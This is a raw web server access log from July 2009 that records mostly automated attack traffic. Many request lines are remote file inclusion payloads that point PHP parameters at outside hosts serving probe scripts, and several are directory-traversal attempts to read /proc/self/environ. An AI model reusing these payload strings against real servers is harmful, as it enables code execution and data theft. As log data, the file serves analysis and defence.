206.225.23.4 - - [17/Jul/2009:02:15:26 -0400] "GET /logs/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:26 -0400] "GET /popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:26 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:27 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:30 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:30 -0400] "GET /logs/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:30 -0400] "GET /popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:48 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:48 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:15:48 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:16:35 -0400] "GET /logs/access_log.Q109050700//classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:16:35 -0400] "GET /logs//classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:16:35 -0400] "GET //classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:16:43 -0400] "GET /logs/access_log.Q109050700//classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:16:43 -0400] "GET /logs//classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:16:43 -0400] "GET //classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.153.6.44 - - [17/Jul/2009:02:17:23 -0400] "GET /logs/access_log.Q109061300//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.153.6.44 - - [17/Jul/2009:02:17:23 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.153.6.44 - - [17/Jul/2009:02:17:23 -0400] "GET /logs/access_log.Q109061300//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
85.153.6.44 - - [17/Jul/2009:02:17:24 -0400] "GET /logs/access_log.Q109061300//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
209.59.12.99 - - [17/Jul/2009:02:18:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.189.27.78 - - [17/Jul/2009:02:18:41 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs/access_log.Q109061200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
74.55.209.250 - - [17/Jul/2009:02:20:00 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
66.249.68.70 - - [17/Jul/2009:02:20:12 -0400] "GET /images/items/index6_halfsheets.jpg HTTP/1.1" 200 1730 "-" "Googlebot-Image/1.0"
77.221.130.14 - - [17/Jul/2009:02:20:15 -0400] "GET /logs/access_log.Q109050700%20%20//classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:02:20:17 -0400] "GET /logs/access_log.Q109050700%20%20//classes/TplLoad.php?full_path_to_public_program=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.55.209.250 - - [17/Jul/2009:02:21:04 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [17/Jul/2009:02:21:05 -0400] "GET /logs/access_log.Q109052200/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
74.55.209.250 - - [17/Jul/2009:02:21:05 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
74.55.209.250 - - [17/Jul/2009:02:21:05 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
210.205.57.2 - - [17/Jul/2009:02:22:02 -0400] "GET /logs/access_log.Q109062500//?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
210.205.57.2 - - [17/Jul/2009:02:22:02 -0400] "GET /logs/access_log.Q109062500//?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
210.205.57.2 - - [17/Jul/2009:02:22:03 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
210.205.57.2 - - [17/Jul/2009:02:22:03 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
210.205.57.2 - - [17/Jul/2009:02:22:03 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 200 9865 "-" "libwww-perl/5.79"
210.205.57.2 - - [17/Jul/2009:02:22:04 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt??? HTTP/1.1" 200 9865 "-" "libwww-perl/5.79"
87.106.245.84 - - [17/Jul/2009:02:23:09 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:23:09 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:23:10 -0400] "GET /logs/access_log.Q109061100//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:23:22 -0400] "GET /logs/access_log.Q109052100//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:02:23:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [17/Jul/2009:02:24:37 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:24:37 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:24:37 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:25:00 -0400] "GET /logs/access_log.Q109062200/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:25:25 -0400] "GET /logs/access_log.Q109061100%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:25:29 -0400] "GET /logs/access_log.Q109052100%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:02:26:14 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
211.230.156.161 - - [17/Jul/2009:02:26:14 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
211.230.156.161 - - [17/Jul/2009:02:26:14 -0400] "GET //include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
212.112.224.125 - - [17/Jul/2009:02:26:56 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
212.112.224.125 - - [17/Jul/2009:02:26:56 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
206.225.23.4 - - [17/Jul/2009:02:26:56 -0400] "GET /logs/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:26:56 -0400] "GET /errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:26:56 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.112.224.125 - - [17/Jul/2009:02:26:57 -0400] "GET //include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
206.225.23.4 - - [17/Jul/2009:02:26:57 -0400] "GET /errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:26:58 -0400] "GET /logs/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:26:58 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:26:59 -0400] "GET /errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:27:00 -0400] "GET /logs/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:27:00 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:27:27 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:27:27 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:27:30 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:27:41 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:27:58 -0400] "GET /errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:27:58 -0400] "GET /logs/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:27:58 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.199.214 - - [17/Jul/2009:02:28:06 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.54.177.242 - - [17/Jul/2009:02:28:07 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.0" 404 262 "-" "Mozilla/5.0"
200.54.177.242 - - [17/Jul/2009:02:28:07 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
200.54.177.242 - - [17/Jul/2009:02:28:07 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
94.102.9.216 - - [17/Jul/2009:02:28:38 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.102.9.216 - - [17/Jul/2009:02:28:38 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.102.9.216 - - [17/Jul/2009:02:28:38 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:02:28:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
164.77.114.237 - - [17/Jul/2009:02:28:40 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
164.77.114.237 - - [17/Jul/2009:02:28:40 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
164.77.114.237 - - [17/Jul/2009:02:28:40 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:29:14 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:29:25 -0400] "GET /template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:29:25 -0400] "GET /logs/template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:29:25 -0400] "GET /logs/access_log.Q109070200/template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:29:26 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:29:31 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:29:39 -0400] "GET /template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:02:29:39 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:29:39 -0400] "GET /logs/template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:29:39 -0400] "GET /logs/access_log.Q109070200%20%20/template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:29:59 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:02:30:13 -0400] "GET /logs/access_log.Q109062200%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:30:32 -0400] "GET /logs/access_log.Q109070300/template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.54.177.242 - - [17/Jul/2009:02:31:06 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.0" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:31:21 -0400] "GET //common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:31:21 -0400] "GET /logs//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:31:21 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:31:58 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:31:58 -0400] "GET //common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:31:58 -0400] "GET /logs//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
164.77.114.237 - - [17/Jul/2009:02:31:58 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.245.84 - - [17/Jul/2009:02:32:06 -0400] "GET /logs/access_log.Q109070600%20%20/template/album.php?SECURITY_FILE=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:32:23 -0400] "GET //common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:32:23 -0400] "GET /logs//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:02:32:23 -0400] "GET /logs/error_log.Q109070500%20%20//common/db.php?commonpath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.54.177.242 - - [17/Jul/2009:02:32:44 -0400] "GET /logs/error_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:02:33:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
164.77.114.237 - - [17/Jul/2009:02:33:48 -0400] "GET /logs/error_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:33:59 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:33:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:33:59 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:33:59 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:34:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:34:59 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:34:59 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
79.174.68.88 - - [17/Jul/2009:02:35:08 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
